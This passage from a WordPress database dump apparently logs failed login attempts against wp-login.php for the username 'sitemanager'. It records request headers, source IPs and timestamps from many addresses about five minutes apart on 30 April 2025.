S\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745967392.687886;s:12:\"REQUEST_TIME\";i:1745967392;}}','81.181.254.43',0,'2025-04-30 04:26:34','1970-01-01 00:00:00'),(94412,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"gzip, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"49296\";s:11:\"REMOTE_ADDR\";s:13:\"68.65.120.171\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745967700.6688781;s:12:\"REQUEST_TIME\";i:1745967700;}}','68.65.120.171',0,'2025-04-30 04:31:42','1970-01-01 00:00:00'),(94413,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"he-IL,he;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, br, zstd\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:133:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.96 Safari/537.36 Edg/116.0.1938.62\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"37244\";s:11:\"REMOTE_ADDR\";s:12:\"89.46.109.92\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745968009.4922171;s:12:\"REQUEST_TIME\";i:1745968009;}}','89.46.109.92',0,'2025-04-30 04:36:51','1970-01-01 00:00:00'),(94414,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, zstd, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:84:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56512\";s:11:\"REMOTE_ADDR\";s:13:\"195.161.114.5\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745968319.3804791;s:12:\"REQUEST_TIME\";i:1745968319;}}','195.161.114.5',0,'2025-04-30 04:42:01','1970-01-01 00:00:00'),(94415,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"fr-FR,fr;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"111\";s:15:\"HTTP_USER_AGENT\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"42550\";s:11:\"REMOTE_ADDR\";s:13:\"157.245.6.207\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"111\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745968625.0202439;s:12:\"REQUEST_TIME\";i:1745968625;}}','157.245.6.207',0,'2025-04-30 04:47:06','1970-01-01 00:00:00'),(94416,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"sv-SE,sv;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, deflate, br\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:128.0) Gecko/20100101 Firefox/128.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56116\";s:11:\"REMOTE_ADDR\";s:13:\"66.29.141.104\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745968944.271312;s:12:\"REQUEST_TIME\";i:1745968944;}}','66.29.141.104',0,'2025-04-30 04:52:26','1970-01-01 00:00:00'),(94417,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"pt-BR,pt;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, deflate, zstd\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:83:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 13.3; rv:126.0) Gecko/20100101 Firefox/126.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"44526\";s:11:\"REMOTE_ADDR\";s:12:\"68.65.123.76\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745969244.4259551;s:12:\"REQUEST_TIME\";i:1745969244;}}','68.65.123.76',0,'2025-04-30 04:57:26','1970-01-01 00:00:00'),(94418,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"de-DE,de;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:14:\"gzip, zstd, br\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.9\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"113\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 Firefox/129.0\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"35240\";s:11:\"REMOTE_ADDR\";s:12:\"23.239.27.53\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"113\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745969555.6814401;s:12:\"REQUEST_TIME\";i:1745969555;}}','23.239.27.53',0,'2025-04-30 05:02:37','1970-01-01 00:00:00'),(94419,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:11:\"HTTP_ACCEPT\";s:96:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.138 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"22136\";s:11:\"REMOTE_ADDR\";s:14:\"185.104.44.165\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745969857.98876;s:12:\"REQUEST_TIME\";i:1745969857;}}','185.104.44.165',0,'2025-04-30 05:07:39','1970-01-01 00:00:00'),(94420,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"ja-JP,ja;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, br, zstd, deflate\";s:11:\"HTTP_ACCEPT\";s:85:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"114\";s:15:\"HTTP_USER_AGENT\";s:111:\"Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"59470\";s:11:\"REMOTE_ADDR\";s:15:\"199.188.200.133\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"114\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745970167.0742171;s:12:\"REQUEST_TIME\";i:1745970167;}}','199.188.200.133',0,'2025-04-30 05:12:48','1970-01-01 00:00:00'),(94421,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"el-GR,el;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, deflate, br, zstd\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"112\";s:15:\"HTTP_USER_AGENT\";s:135:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36 Edg/115.0.1901.203\";s:9:\"HTTP_HOST\";s:10:\"gopalak.in\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"SERVER_NAME\";s:23:\"s10333402.saturnwp.link\";s:11:\"SERVER_PORT\";s:2:\"80\";s:11:\"SERVER_ADDR\";s:13:\"172.31.35.131\";s:11:\"REMOTE_PORT\";s:5:\"56340\";s:11:\"REMOTE_ADDR\";s:13:\"186.64.116.45\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:13:\"DOCUMENT_ROOT\";s:34:\"/storage/v6964/gopalak/public_html\";s:12:\"DOCUMENT_URI\";s:13:\"/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"112\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:12:\"QUERY_STRING\";s:0:\"\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"PHP_ADMIN_VALUE\";s:32:\"open_basedir=/storage/v6964:/tmp\";s:15:\"SCRIPT_FILENAME\";s:47:\"/storage/v6964/gopalak/public_html/wp-login.php\";s:9:\"FCGI_ROLE\";s:9:\"RESPONDER\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";d:1745970478.272007;s:12:\"REQUEST_TIME\";i:1745970478;}}','186.64.116.45',0,'2025-04-30 05:18:00','1970-01-01 00:00:00'),(94422,1,'a:2:{s:8:\"username\";s:11:\"sitemanager\";s:6:\"server\";a:36:{s:15:\"SERVER_SOFTWARE\";s:12:\"nginx/1.18.0\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:4:\"USER\";s:8:\"www-data\";s:4:\"HOME\";s:8:\"/var/www\";s:12:\"HTTP_REFERER\";s:17:\"http://gopalak.in\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:17:\"HTTP_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"nl-NL,nl;q=0.9\";s:20:\"HTTP_ACCEPT_ENCODING\";s:23:\"gzip, zstd, br, deflate\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.7\";s:19:\"HTTP_CONTENT_LENGTH\";s:3:\"115\";s:15:\"HTTP_USER_AGENT\";s:86:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:129.0) Gecko/20100101 